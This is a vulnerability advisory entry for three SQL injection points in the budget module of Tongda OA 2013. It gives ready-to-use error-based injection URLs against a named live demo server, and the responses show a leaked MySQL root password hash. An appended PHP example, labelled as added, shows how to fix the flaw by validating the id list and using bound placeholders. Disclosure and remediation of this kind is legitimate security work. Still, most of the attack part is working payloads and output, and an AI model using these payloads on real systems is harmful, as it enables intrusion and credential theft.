Tongda OA 2013 Group Edition: 3 SQL injection points

2015-04-09T00:00:00
ID SSV:96104
Type seebug
Reporter Root
Modified 2015-04-09T00:00:00

Description

Brief description:

Tongda

Details:

Official demo login: http://www.day900.com/ (logging in as cw; of fairly limited value)

Proof of vulnerability:

Injection 1 + payload:
http://www.day900.com/general/budget/budget_process/budget_project_depts.php?DEPT_ID=1&DEPT_ID_PRIV=0&DEPT_IDS=1) and%20(select%201%20from%20(select%20count(),concat((select%20concat(host,user,password)%20from%20mysql.user%20limit%200,1),floor(rand(0)2))x%20from%20information_schema.tables%20group%20by%20x)a)%23&YEAR=2015

Response:
请联系管理员
错误#1062: Duplicate entry 'localhostroot91AF99F23C3D4ED85140D100433725DFA52BECEE1' for key 'group_key'
SQL语句: SELECT COUNT(BUDGET_RESULT_ID) FROM BUDGET_RESULT WHERE FORMATION_WAY='P' AND DEPT_ID IN (1) and (select 1 from (select count(),concat((select concat(host,user,password) from mysql.user limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)#) AND ALLOW = '1' AND BUDGET_YEAR ='2015'
文件:/general/budget/budget_process/budget_project_depts.php

Injection 2 + payload:
http://www.day900.com/general/budget/budget_process/budget_month_depts.php?DEPT_ID=1&DEPT_ID_PRIV=0&DEPT_IDS=1)and%20(select%201%20from%20(select%20count(),concat((select%20concat(host,user,password)%20from%20mysql.user%20limit%200,1),floor(rand(0)2))x%20from%20information_schema.tables%20group%20by%20x)a)%23&YEAR=2015

Response:
请联系管理员
错误#1062: Duplicate entry 'localhostroot91AF99F23C3D4ED85140D100433725DFA52BECEE1' for key 'group_key'
SQL语句: SELECT COUNT(DISTINCT BUDGET_ID) FROM BUDGET_RESULT WHERE FORMATION_WAY='M' AND ALLOW = '1' AND DEPT_ID IN (1)and (select 1 from (select count(),concat((select concat(host,user,password) from mysql.user limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)#) AND BUDGET_YEAR ='2015'
文件:/general/budget/budget_process/budget_month_depts.php

Injection 3 + payload:
http://www.day900.com/general/budget/budget_process/budget_quater_depts.php?DEPT_ID=1&DEPT_ID_PRIV=0&DEPT_IDS=1)and%20(select%201%20from%20(select%20count(),concat((select%20concat(host,user,password)%20from%20mysql.user%20limit%200,1),floor(rand(0)2))x%20from%20information_schema.tables%20group%20by%20x)a)%23 &YEAR=2015

Response:
请联系管理员
错误#1062: Duplicate entry 'localhostroot91AF99F23C3D4ED85140D100433725DFA52BECEE1' for key 'group_key'
SQL语句: SELECT COUNT(DISTINCT BUDGET_ID) FROM BUDGET_RESULT WHERE FORMATION_WAY='M' AND ALLOW = '1' AND DEPT_ID IN (1)and (select 1 from (select count(),concat((select concat(host,user,password) from mysql.user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#) AND BUDGET_YEAR ='2015'
文件:/general/budget/budget_process/budget_quarter_depts.php

Injection 3 + payload:
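
All three responses show DEPT_IDS placed unmodified inside DEPT_ID IN (...). The following is an added remediation example, not Tongda OA code or part of the original report: it validates the list as integers and binds one placeholder per id. Table and column names come from the SQL in the error output; the function names and the in-memory SQLite database are assumptions for the demonstration.

```php
<?php
// Added example, not Tongda OA code: safe handling of a DEPT_IDS-style list.
// parse_id_list() and count_budget_results() are hypothetical names.

/** Parse "1,2,3" into a list of ints; reject anything else. */
function parse_id_list(string $raw, int $max = 200): array
{
    // Only digits separated by commas: no spaces, parentheses or comment marks.
    if (!preg_match('/^\d{1,9}(,\d{1,9})*$/', $raw)) {
        throw new InvalidArgumentException('DEPT_IDS must be a comma-separated list of integers');
    }
    $ids = array_map('intval', explode(',', $raw));
    if (count($ids) > $max) {
        throw new InvalidArgumentException('too many ids');
    }
    return $ids;
}

/** Count budget rows using one bound placeholder per id. */
function count_budget_results(PDO $db, string $rawIds, string $year): int
{
    $ids = parse_id_list($rawIds);
    $marks = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $db->prepare(
        "SELECT COUNT(BUDGET_RESULT_ID) FROM BUDGET_RESULT
         WHERE FORMATION_WAY = 'P' AND DEPT_ID IN ($marks)
           AND ALLOW = '1' AND BUDGET_YEAR = ?"
    );
    $stmt->execute(array_merge($ids, [$year]));
    return (int) $stmt->fetchColumn();
}

// Constructed demo data in an in-memory SQLite database (assumption: pdo_sqlite is enabled).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE BUDGET_RESULT (BUDGET_RESULT_ID INTEGER, FORMATION_WAY TEXT,
           DEPT_ID INTEGER, ALLOW TEXT, BUDGET_YEAR TEXT)");
$db->exec("INSERT INTO BUDGET_RESULT VALUES (1,'P',1,'1','2015'), (2,'P',2,'1','2015')");

echo count_budget_results($db, '1,2', '2015'), "\n";        // well-formed list
try {
    count_budget_results($db, '1) and (select 1)#', '2015'); // same shape as the reported input
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

The responses above also return the full SQL statement and the database error text to the client; logging those server-side and returning a generic message removes the error channel the report relies on.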